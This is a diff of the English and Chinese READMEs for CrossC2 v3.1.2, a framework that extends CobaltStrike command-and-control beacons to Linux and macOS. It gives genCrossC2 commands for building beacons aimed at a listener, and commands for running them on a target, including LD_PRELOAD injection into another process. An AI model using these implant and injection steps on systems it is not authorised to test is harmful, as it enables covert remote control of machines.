CrossC2 v3.1.2 - autoparse Malleable C2 Profile

README.md

@@ -1,7 +1,7 @@
 # CrossC2 framework
 
-[![ Linux ](https://svgshare.com/i/Zhy.svg)](https://svgshare.com/i/Zhy.svg)
-[![ macOS ](https://svgshare.com/i/ZjP.svg)](https://svgshare.com/i/ZjP.svg)
+![ Linux ](https://img.shields.io/badge/platform-Linux-green)
+![ macOS ](https://img.shields.io/badge/platform-macOS-green)
 [![GitHub issues-closed](https://img.shields.io/github/issues-closed/gloxec/CrossC2.svg)](https://GitHub.com/gloxec/CrossC2/issues?q=is%3Aissue+is%3Aclosed)
 [![Release](https://img.shields.io/github/release/gloxec/CrossC2.svg)](https://github.com/gloxec/CrossC2/releases/latest)
 [![Downloads](https://img.shields.io/github/downloads/gloxec/CrossC2/total?label=Release%20Download)](https://github.com/gloxec/CrossC2/releases/latest)
@@ -20,7 +20,7 @@
 
 Support CobaltStrike's security assessment of other platforms (Linux/MacOS/...), and include the development support of Unix post-penetration module
 
-|                 | CS3.14(bug fixes) | CS4.0 | CS4.X (>=4.1) |
+|                 | CS3.14(bug fixes) | CS4.0 | CS4.X (4.1~4.8) |
 |-----------------|----------|-------|---------------|
 | Master branch        | ✅        |       |               |
 | cs4.0 branch         |          | ✅     |               |
@@ -29,6 +29,8 @@ Support CobaltStrike's security assessment of other platforms (Linux/MacOS/...),
 | Release Page <= v2.1 | ✅        |       |               |
 | Release Page >= v2.2 |          |       | ✅             |
 
+![2023-07-31 16.56.51](media/16292585578533/CrossC2_action.gif)
+
 # Usage
 
 > 1. Download
@@ -49,17 +51,22 @@ Download **CrossC2.cna** **genCrossC2** **CrossC2Kit**, modify `CrossC2.cna` con
 
 Use the GUI function provided by cli or cna to generate beacon by default
 
-* When teamserver is configured with c2profile, the rebind library needs to be generated in advance for use when generating beacon
-* When using the forwarding method, in addition to specifying the rebind library, you also need to pay attention to the C2_HOST field when generating:
-    * When the service provider uses the HTTP request content to verify the type, it needs to specify the CDN IP list: `genCrossC2 1.1.1.1,2.2.2.2,3.3.3.3,xxx.xxx.xxx.xx ...`
-    * When the CDN server is verified by SNI, CDN operators such as Cloudflare need to specify the domain name bound to the CDN: `genCrossC2 c2.domain.com ...`
+`genCrossC2 <listener-ip/domain> <listener-port> <beacon_keys> <rebind_library;config.ini;c2profile.profile> <target_platform> <target_arch>`
+
+ex:
+
+```
+1. read BEACON_KEY from current path and generate BEACON of default C2Profile traffic protocol
+    genCrossC2 127.0.0.1 5555 null null Linux x64 beacon.out
+     
+2. specify the BEACON of the custom protocol dynamic library
+    genCrossC2 127.0.0.1 5555 .cobaltstrike.beacon_keys c2profile.so MacOS x64 beacon.out
+
+3. specify the C2Profile that needs to be automatically parsed
+    genCrossC2 www.example.com 443 .cobaltstrike.beacon_keys ";;c2profile.profile" Linux x64 beacon.out
+```
 
-Rebind library related introduction: 
-* [📖wiki](https://gloxec.github.io/CrossC2/zh_cn/protocol/)
-* Demo: 
-    * C2Profile demo [📄demo_c2profile.profile](https://github.com/gloxec/CrossC2/blob/cs4.1/protocol_demo/https.profile) [📄demo_c2profil_rebind.c](https://github.com/gloxec/CrossC2/blob/cs4.1/protocol_demo/c2profile.c) 
-    * UDP communication demo [📄demo_udp_proxy_server.c](https://github.com/gloxec/CrossC2/blob/cs4.1/protocol_demo/proxy_udp.py) [📄demo_udp_rebind.c](https://github.com/gloxec/CrossC2/blob/cs4.1/protocol_demo/rebind_udp.c)
-* Issues: [🏷issue #65 (Example of data transfer and c2profile field correspondence)](https://github.com/gloxec/CrossC2/issues/65)、[🏷issue #89 (Data processing example)](https://github.com/gloxec/CrossC2/issues/89#issuecomment-861194022)
+more advanced configuration can be found in the documentation: [📄Reference](https://github.com/gloxec/CrossC2/wiki/genCrossC2)
 
 > 5. Run beacon
 
@@ -70,6 +77,20 @@ Rebind library related introduction:
 * Temporarily set C2 configuration for beacon: `export CCHOST=127.0.0.1 && export CCPORT=443 && /tmp/c2`
 * Set DEBUG to view the online status of beacon: `export CCDEBUG=1 && /tmp/c2`
 
+# CrossC2Kit
+
+CrossC2Kit: https://github.com/CrossC2/CrossC2Kit
+
+CrossC2Kit is an infiltration expansion around the Unix platform derived from CrossC2. Use **Aggressor Script** Open Source Script engine. It can be used to create automation to simulate the operation process of the Red Team and expand the **CobaltStrike** client.
+
+**CrossC2Kit** is inherited from the original features of **CobaltStrike**, so the development and writing grammar still refer to the official documentation: https://trial.cobaltstrike.com/aggressor-script/index.html
+
+But it has some API extensions on top of CrossC2 to control the **beacon** of the Unix platform
+
+API: [📄Reference](https://github.com/CrossC2/CrossC2Kit/wiki/API-Reference)
+
+Demo: ![CrossC2_action2](media/16292585578533/CrossC2_action2.gif)
+
 # Note
 
 `Only for internal use by enterprises and organizations, this framework has a certain degree of instability. Non-professionals are not allowed to use it. Anyone shall not use it for illegal purposes and profitability. Besides that, publishing unauthorized modified version is also prohibited, or otherwise bear legal responsibilities.`

README_zh.md

@@ -1,7 +1,7 @@
 # CrossC2 framework
 
-[![ Linux ](https://svgshare.com/i/Zhy.svg)](https://svgshare.com/i/Zhy.svg)
-[![ macOS ](https://svgshare.com/i/ZjP.svg)](https://svgshare.com/i/ZjP.svg)
+![ Linux ](https://img.shields.io/badge/platform-Linux-green)
+![ macOS ](https://img.shields.io/badge/platform-macOS-green)
 [![GitHub issues-closed](https://img.shields.io/github/issues-closed/gloxec/CrossC2.svg)](https://GitHub.com/gloxec/CrossC2/issues?q=is%3Aissue+is%3Aclosed)
 [![Release](https://img.shields.io/github/release/gloxec/CrossC2.svg)](https://github.com/gloxec/CrossC2/releases/latest)
 [![Downloads](https://img.shields.io/github/downloads/gloxec/CrossC2/total?label=Release%20Download)](https://github.com/gloxec/CrossC2/releases/latest)
@@ -20,7 +20,7 @@
 
 支持CobaltStrike对其他平台(Linux/MacOS/...)的安全评估，及包含Unix后渗透模块开发支持
 
-|                 | CS3.14(bug fixes) | CS4.0 | CS4.X (>=4.1) |
+|                 | CS3.14(bug fixes) | CS4.0 | CS4.X (4.1~4.8) |
 |-----------------|----------|-------|---------------|
 | Master分支        | ✅        |       |               |
 | cs4.0分支         |          | ✅     |               |
@@ -29,46 +29,75 @@
 | Release 页面 <= v2.1 | ✅        |       |               |
 | Release 页面 >= v2.2 |          |       | ✅             |
 
+![2023-07-31 16.56.51](media/16292585578533/CrossC2_action.gif)
+
+
 # Usage
 
-> 1. 下载
+Usage 链接: 
+
+>  1. 下载
+
+从 [Release页面](https://github.com/gloxec/CrossC2/releases) 下载:
 
-下载**CrossC2.cna** **genCrossC2** **CrossC2Kit**, 修改`CrossC2.cna`配置
+1. **genCrossC2** (beacon生成器)
+2. **CrossC2.cna** (GUI生成器插件) 修改`CrossC2.cna`配置并加载
+3. **CrossC2Kit** (CrossC2相关插件) 加载 `CrossC2Kit_loader.cna`
 
-> 2. 创建listener与拷贝key
+>  2. 创建listener与拷贝key
 
 * 创建`windows/beacon_https/reverse_https` listener
 * 拷贝**teamserver目录**的 `.cobaltstrike.beacon_keys`到**本地**
 
-> 3. 功能扩展
+>  3. 功能扩展
 
 * 添加`CrossC2Kit_Loader.cna`, 包含内存加载等其它功能
-* `cs4.x`版本文件管理、进程列表功能缺失，必须使用此Loader来重启
+* `cs4.x`版本文件管理、进程列表功能被CS官方移除，必须使用此Loader来重启
 
-> 4. 生成beacon
+>  4. 生成beacon
 
 默认使用cli或cna提供的GUI功能生成beacon
 
-* 当teamserver配置了c2profile时，需要提前生成rebind库供生成beacon时使用
-* 当使用转发方式时, 除了指定rebind库外，生成时同样需要注意C2_HOST字段:
-    * 服务商使用HTTP请求内容进行校验类型时，需指定CDN IP列表: `genCrossC2 1.1.1.1,2.2.2.2,3.3.3.3,xxx.xxx.xxx.xx ...`
-    * 当CDN服务器通过SNI进行校验时，如Cloudflare等CDN运行商，需指定CDN绑定的域名: `genCrossC2 c2.domain.com ...`
+`genCrossC2 <listener-ip/domain> <listener-port> <beacon_keys> <rebind_library;config.ini;c2profile.profile> <target_platform> <target_arch>`
+
+ex:
 
-rebind库相关介绍: 
-* [📖wiki](https://gloxec.github.io/CrossC2/zh_cn/protocol/)
-* Demo: 
-    * C2Profile demo [📄demo_c2profile.profile](https://github.com/gloxec/CrossC2/blob/cs4.1/protocol_demo/https.profile) [📄demo_c2profil_rebind.c](https://github.com/gloxec/CrossC2/blob/cs4.1/protocol_demo/c2profile.c) 
-    * UDP通信 demo [📄demo_udp_proxy_server.c](https://github.com/gloxec/CrossC2/blob/cs4.1/protocol_demo/proxy_udp.py) [📄demo_udp_rebind.c](https://github.com/gloxec/CrossC2/blob/cs4.1/protocol_demo/rebind_udp.c)
-* Issues: [🏷issue #65 (数据传递与c2profile字段对应示例)](https://github.com/gloxec/CrossC2/issues/65)、[🏷issue #89 (数据处理示例)](https://github.com/gloxec/CrossC2/issues/89#issuecomment-861194022)
+```
+1. 从当前路径读取beacon Key并生成默认profile流量协议的beacon
+    genCrossC2 127.0.0.1 5555 null null Linux x64 beacon.out
+     
+2. 指定自定义协议动态库的beacon
+    genCrossC2 127.0.0.1 5555 .cobaltstrike.beacon_keys c2profile.so MacOS x64 beacon.out
+
+3. 指定需要自动解析的c2profile
+    genCrossC2 www.example.com 443 .cobaltstrike.beacon_keys ";;c2profile.profile" Linux x64 beacon.out
+```
+
+更多高级配置具体可见文档: [📄文档](https://github.com/gloxec/CrossC2/wiki/genCrossC2_zh)
 
 > 5. 运行beacon
 
 * 在目标上运行CrossC2插件生成的一键上线脚本
 * 上传beacon至目标机器后进行赋权运行
+* 以动态库方式注入其他进程执行: `LD_PRELOAD=/tmp/c2.so java`
 * 为beacon设定工作目录并运行: `export CCPATH=/opt/ && /tmp/c2`
 * 为beacon临时指定协议库并运行: `/tmp/c2 /tmp/c2-rebind.so`
 * 为beacon临时设定C2配置: `export CCHOST=127.0.0.1 && export CCPORT=443 && /tmp/c2`
-* 设定DEBUG查看beacon上线状态: `export CCDEBUG=1 && /tmp/c2`
+
+# CrossC2Kit
+
+CrossC2Kit: https://github.com/CrossC2/CrossC2Kit
+
+CrossC2Kit 是围绕着CrossC2 衍生出的Unix平台后渗透扩展，采用 **Aggressor Script** 开源脚本引擎。可以用来创建自动化来模拟红队操作过程，以及扩展CobaltStrike客户端。
+
+CrossC2Kit 整体继承于CobaltStrike原有的功能，所以开发与编写语法仍然参照官方文档: https://trial.cobaltstrike.com/aggressor-script/index.html
+
+但它在 CrossC2 之上又进行了一些API拓展，用于控制 Unix 平台beacon
+
+API: [📄文档](https://github.com/CrossC2/CrossC2Kit/wiki/API-Reference)
+
+使用演示: ![CrossC2_action2](media/16292585578533/CrossC2_action2.gif)
+
 
 # 提示
 
@@ -77,8 +106,8 @@ rebind库相关介绍:
 # todo
 
 1. http-proxy (auth) & socks 代理回连支持
-5. node beacon? (单个节点式，可进行不依靠teamserver托管其他beacon)
-6. Linux & MacOS 端so/dylib的上线支持、及其衍生的进程注入等功能
+2. node beacon? (单个节点式，可进行不依靠teamserver托管其他beacon)
+- [x] 3. Linux & MacOS 端so/dylib的上线支持、及其衍生的进程注入等功能
 
 # 感谢